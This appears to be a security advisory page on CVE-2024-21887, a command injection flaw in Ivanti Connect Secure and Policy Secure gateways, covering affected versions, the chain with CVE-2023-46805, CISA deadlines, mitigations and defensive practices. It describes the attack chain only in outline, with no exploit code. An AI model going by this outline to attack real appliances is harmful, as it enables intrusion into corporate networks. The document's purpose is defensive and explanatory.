Ivanti Connect Secure (ICS) and Ivanti Policy Secure contain a command injection vulnerability (CVE-2024-21887) in web components, allowing authenticated administrators to execute arbitrary commands. This is frequently chained with CVE-2023-46805 for unauthenticated access.
FREQUENTLY ASKED
What is CVE-2024-21887 and why does it matter?
CVE-2024-21887 is a critical command injection vulnerability (CVSS 9.1) in Ivanti Connect Secure and Ivanti Policy Secure gateways. It matters because it allows attackers to execute arbitrary code on the appliance. When paired with CVE-2023-46805, an authentication bypass, it enables unauthenticated remote code execution, posing a severe risk of total system compromise and network-wide intrusion.
Which versions of the Ivanti products are affected?
The vulnerability affects Ivanti Connect Secure and Ivanti Policy Secure versions 9.x and 22.x. Specifically, versions 9.1R18, 22.6R2, and 22.6R1 are identified as affected. Organizations should check their appliance software version against these specific releases to determine their exposure level and apply necessary vendor-provided mitigations immediately.
Has a patch been released for CVE-2024-21887?
As of the disclosure date, Ivanti has provided mitigations via a configuration file (mitigation.release.20240105.1.xml) to address the issue while a permanent patch is developed. Users must follow the official Ivanti forum link to download and import these mitigations. Applying these temporary fixes is critical to blocking the exploitation vectors used in active attacks.
What is the remediation deadline for CVE-2024-21887?
The remediation deadline is January 22, 2024. For federal agencies and organizations following CISA directives, this deadline is a mandatory compliance date for applying mitigations or discontinuing the use of the product. This aggressive timeline reflects the 'Critical' severity and the evidence of active exploitation in the wild by threat actors.
How can I check if my deployment is affected by this vulnerability?
Organizations can check for impact by verifying their product version and running the Ivanti Integrity Checker Tool. Monitoring system logs for unusual administrative requests or unauthorized command execution is also recommended. Because this vulnerability is known to be used by ransomware groups, any signs of compromise should trigger an immediate incident response protocol.
CVE-2024-21887 is a CRITICAL command injection vulnerability in Ivanti Connect Secure and Ivanti Policy Secure web components, carrying a CVSS score of 9.1. Due to its active exploitation in the wild and potential for ransomware deployment, organizations must apply mitigations or patches by the January 22, 2024 remediation deadline to prevent total appliance compromise.
Mitigations available; check vendor for latest updates
Technical Deep Dive: Understanding CWE-77 in Ivanti Gateways
CVE-2024-21887 is categorized under CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection'). In the context of Ivanti Connect Secure (formerly Pulse Connect Secure), this vulnerability resides within the web-based management components. Command injection occurs when an application passes unsafe, user-supplied data (such as form inputs or HTTP headers) to a system shell. Because the application fails to properly sanitize these inputs, an attacker can inject their own operating system commands, which are then executed with the privileges of the application process.
In this specific case, the flaw allows an authenticated administrator to send specially crafted requests to the appliance's web interface. These requests bypass standard input filters and interact directly with the underlying Linux-based operating system. While the base CVE requires administrative privileges, the real-world danger is amplified by the architectural placement of these gateways. As the primary entry point for remote access into corporate networks, a compromise of the Ivanti appliance provides the attacker with a high-privilege foothold inside the DMZ or the internal network.
The Blast Radius
The "blast radius" for CVE-2024-21887 is immense. Because the vulnerability allows for arbitrary command execution, an attacker can:
Establish Persistence: Install backdoors or webshells that survive reboots.
Credential Harvesting: Intercept user credentials as they authenticate to the VPN.
Lateral Movement: Use the appliance as a pivot point to scan and attack other internal systems.
Data Exfiltration: Access sensitive configuration data or user traffic passing through the gateway.
The Attack Chain: From Authenticated Admin to Arbitrary Execution
While CVE-2024-21887 is technically an "authenticated" vulnerability, it is almost exclusively discussed in tandem with CVE-2023-46805, an authentication bypass vulnerability. By chaining these two flaws together, threat actors can bypass the need for valid credentials entirely.
The Bypass: The attacker exploits CVE-2023-46805 to gain access to restricted web endpoints without logging in.
The Injection: Once access is gained, the attacker leverages CVE-2024-21887 to inject commands into the vulnerable web components.
The Execution: The appliance executes the injected commands, granting the attacker a root shell or the ability to run scripts.
This chain effectively converts a post-authentication flaw into a pre-authentication Remote Code Execution (RCE) exploit. Security researchers have observed multiple threat actors using this specific chain to deploy webshells and facilitate further network intrusion. The high EPSS score of 0.94412 reflects the extreme likelihood that any exposed and unmitigated instance will be targeted by automated scanning tools and sophisticated APT groups.
Who Is Affected: Impacted Versions and Compliance Mandates
This vulnerability impacts a wide range of organizations globally, particularly those relying on Ivanti Connect Secure (ICS) and Ivanti Policy Secure (IPS) for Secure Enhanced Remote Access. The primary affected versions include:
Ivanti Connect Secure: 9.1R18, 22.6R2, and earlier 9.x/22.x versions.
Ivanti Policy Secure: 9.1R18, 22.6R1, and associated 9.x/22.x versions.
Compliance and CISA BOD 22-01
Due to the "active exploitation" status, CISA has added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. Under Binding Operational Directive (BOD) 22-01, federal civilian executive branch agencies are required to remediate this vulnerability by January 22, 2024. For private sector organizations, this deadline serves as a critical benchmark for risk management. Failure to apply mitigations by this date significantly increases the risk of being targeted by ransomware campaigns, which have historically leveraged Pulse/Ivanti vulnerabilities to lock down enterprise environments.
Official Remediation Steps and Vendor Mitigations
Ivanti has released a staged remediation plan. Because a full patch for all versions was not immediately available at the time of disclosure, the vendor provided an XML-based mitigation to block the exploit vectors.
Download the Mitigation: Access the Ivanti Success Portal to obtain the mitigation.release.20240105.1.xml file.
Import the XML: Navigate to the appliance's maintenance/configuration import section and apply the mitigation file. Note that this may impact some functionality, specifically web-based management features, but it is necessary for security.
Run the Integrity Checker: Ivanti provides an external and internal Integrity Checker Tool (ICT). Administrators should run the newest version of this tool to scan for unauthorized changes to the filesystem, which may indicate a prior compromise.
Plan Version Upgrades: Monitor the Ivanti portal for the release of permanent patches for your specific version (e.g., 9.1R18.2 or 22.6R2.1) and schedule an immediate maintenance window once they become available.
Password Resets: If an appliance is found to be compromised, assume all credentials passed through the device are stolen. A full credential reset for all VPN users and administrative accounts is mandatory.
Enterprise Security Best Practices for VPN Infrastructure
To defend against CWE-77 and similar command injection flaws in the future, organizations should adopt the following defensive measures:
Egress Filtering: Restrict the VPN gateway's ability to initiate outbound connections to the internet. Most exploits require the appliance to 'call home' to a Command and Control (C2) server to download second-stage payloads.
Implement Geo-Blocking: If your workforce is localized to specific regions, block administrative access from IP addresses originating in countries where you do not have operations.
Principle of Least Privilege: Ensure that the administrative accounts used for managing the gateway are used only when necessary and utilize Multi-Factor Authentication (MFA). While MFA does not stop the exploit, it limits the attacker's ability to use stolen admin credentials elsewhere.
Log Centralization: Stream Ivanti system and access logs to a centralized SIEM (Security Information and Event Management) platform. Look for unusual POST requests to administrative endpoints or unusual shell activity.
Zero Trust Architecture (ZTA): Begin migrating toward a Zero Trust Network Access (ZTNA) model. ZTNA reduces reliance on a single 'front door' gateway, making it much harder for an attacker to gain broad network access through a single software vulnerability.
Regular Integrity Audits: Schedule weekly runs of the Ivanti Integrity Checker, even if no vulnerability is currently disclosed. Detecting a compromise early is the only way to prevent a large-scale data breach or ransomware event.
Network Segmentation: Place the VPN gateway in a strictly controlled DMZ with limited access to the core internal network. Use internal firewalls to inspect traffic coming from the VPN gateway for signs of lateral movement.